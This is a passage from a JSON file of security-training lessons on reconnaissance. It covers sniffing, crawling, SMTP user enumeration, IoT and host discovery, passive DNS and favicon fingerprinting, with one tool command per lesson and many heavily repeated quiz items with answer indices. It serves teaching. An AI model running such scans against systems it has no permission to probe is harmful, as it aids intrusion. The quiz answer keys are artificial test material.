emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Parameter discovery tool?","opts":["ffuf","Arjun","gobuster","dirsearch"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"net-sniff","cat":"Reconnaissance","title":"Network Sniffing","diff":2,"xp":125,"intro":"Capture traffic for intel.","sections":[{"type":"text","content":"Sniffing reveals cleartext credentials and API calls."},{"type":"code","lang":"bash","content":"sudo tcpdump -i eth0 -w capture.pcap"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Packet analysis GUI?","opts":["tcpdump","Wireshark","netcat","nmap"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"web-crawl","cat":"Reconnaissance","title":"Web Crawling","diff":1,"xp":75,"intro":"Map all pages and endpoints.","sections":[{"type":"text","content":"Crawlers follow links to build a complete sitemap."},{"type":"code","lang":"bash","content":"katana -u https://example.com -d 3"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Spidering means?","opts":["Port scanning","Following all links","SQLi","DNS enum"],"ans":1},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"smtp-enum","cat":"Reconnaissance","title":"SMTP Enumeration","diff":2,"xp":125,"intro":"Enumerate email users.","sections":[{"type":"text","content":"VRFY and RCPT TO reveal valid usernames."},{"type":"code","lang":"bash","content":"smtp-user-enum -M VRFY -U users.txt -t 10.10.10.1"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"SMTP verify command?","opts":["HELO","VRFY","DATA","QUIT"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"iot-recon","cat":"Reconnaissance","title":"IoT Recon","diff":2,"xp":150,"intro":"Discover IoT devices.","sections":[{"type":"text","content":"IoT devices have default creds and unpatched firmware."},{"type":"code","lang":"bash","content":"nmap -p 80,443,8080,23,1883 10.10.10.0/24"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"IoT messaging protocol?","opts":["HTTP","MQTT","FTP","SMTP"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"passive-dns","cat":"Reconnaissance","title":"Passive DNS","diff":2,"xp":125,"intro":"Historical DNS data.","sections":[{"type":"text","content":"What IPs a domain pointed to historically."},{"type":"code","lang":"bash","content":"dnsrecon -d example.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Passive DNS reveals?","opts":["Current IP","Historical resolution data","Ports","Services"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"host-disc","cat":"Reconnaissance","title":"Host Discovery","diff":1,"xp":75,"intro":"Find live hosts.","sections":[{"type":"text","content":"ICMP, ARP, TCP probes identify active systems."},{"type":"code","lang":"bash","content":"nmap -sn 10.10.10.0/24\narp-scan -l"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Most reliable locally?","opts":["ICMP","ARP scan","TCP SYN","UDP"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"email-sec","cat":"Reconnaissance","title":"Email Security Records","diff":1,"xp":75,"intro":"SPF, DKIM, DMARC checks.","sections":[{"type":"text","content":"Weak records make spoofing trivial."},{"type":"code","lang":"bash","content":"dig TXT _dmarc.example.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Handles SPF/DKIM failure?","opts":["SPF","DKIM","DMARC","MX"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"favicon-fp","cat":"Reconnaissance","title":"Favicon Fingerprint","diff":2,"xp":100,"intro":"Identify tech by favicon hash.","sections":[{"type":"text","content":"Hash the favicon, search Shodan."},{"type":"code","lang":"python","content":"import hashlib,requests\nr=requests.get('http://target/favicon.ico')\nprint(hashlib.md5(r.content).hexdigest())"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Favicon hash search engine?","opts":["Google","Shodan","Bing","DDG"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth 